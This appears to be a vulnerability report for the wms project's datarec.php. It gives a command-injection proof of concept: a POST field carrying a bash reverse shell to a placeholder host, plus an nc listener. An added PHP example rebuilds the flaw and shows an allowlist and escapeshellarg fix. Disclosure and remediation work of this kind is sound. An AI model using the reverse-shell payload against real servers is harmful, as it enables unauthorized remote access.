
Remote Command Execution vulnerability in /wms/src/system/datarec.php

Open leiyuyu041013 opened this issue 3 years ago • 1 comment

An RCE was found in system/datarec.php: $_POST[r_name] is passed directly into $mysqlstr, which is then executed by exec, causing an RCE.

POC: First, start a nc listener.

Next, post a request with the parameter: r_name=$(bash -c 'bash -i >& /dev/tcp/x.x.x.x/8888 0<&1 2>&1')

Finally, you get the reverse shell.

leiyuyu041013, Oct 18 '21 18:10
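The following is an added example, not code from the wms project (datarec.php itself is not reproduced on this page). It reconstructs the pattern the report describes, a POST field concatenated into a shell command string that is then handed to exec(), and places it beside a hardened version. The mysqldump command, the backup path and the function names are assumptions; the payload is the one from the report above, and the block only builds the command strings, it executes nothing.

```php
<?php
// Added example, not the wms project's own code. The real datarec.php is not
// shown on this page; this reconstructs the pattern described in the report
// (a POST field concatenated into $mysqlstr, then run via exec()) and shows
// a hardened alternative. Command, path and function names are hypothetical.

// Vulnerable pattern: the raw POST value is concatenated into the command.
// Because exec() hands the string to /bin/sh, a value such as $(id), `id`
// or ; id is expanded by the shell before the intended program runs, so the
// attacker controls command execution.
function build_backup_cmd_vulnerable(string $r_name): string {
    // Hypothetical stand-in for the $mysqlstr mentioned in the report.
    $mysqlstr = "mysqldump -u root wms > /tmp/backup/" . $r_name . ".sql";
    return $mysqlstr;   // the vulnerable code would then call exec($mysqlstr)
}

// Hardened version: reject anything outside a strict allowlist first, then
// still pass the value through escapeshellarg() as defence in depth.
function build_backup_cmd_hardened(string $r_name): string {
    if (!preg_match('/^[A-Za-z0-9_-]{1,64}$/', $r_name)) {
        throw new InvalidArgumentException('invalid backup name');
    }
    // escapeshellarg() wraps the value in single quotes and escapes any
    // embedded quote, so $(...), backticks, ; and | reach the shell literally.
    $file = escapeshellarg("/tmp/backup/" . $r_name . ".sql");
    return "mysqldump -u root wms > " . $file;
}

// Demonstration with the payload from the report. Only strings are built;
// nothing here is executed.
$payload = "\$(bash -c 'bash -i >& /dev/tcp/x.x.x.x/8888 0<&1 2>&1')";

// The $(...) substitution survives verbatim into the vulnerable command
// string, which is exactly what lets exec() spawn the reverse shell.
echo build_backup_cmd_vulnerable($payload), PHP_EOL;

// The hardened builder refuses the payload outright.
try {
    echo build_backup_cmd_hardened($payload), PHP_EOL;
} catch (InvalidArgumentException $e) {
    echo "rejected: ", $e->getMessage(), PHP_EOL;
}

// A legitimate name passes the allowlist and is still quoted for the shell.
echo build_backup_cmd_hardened("nightly_2021-10-18"), PHP_EOL;
```

The allowlist does the real work: once the value is restricted to `[A-Za-z0-9_-]`, no shell metacharacter can reach exec(). escapeshellarg() is kept as a second layer so that a later relaxation of the regex does not silently reopen the injection. If the backup name does not need to be user-controlled at all, dropping the POST parameter and generating the filename server-side removes the sink entirely.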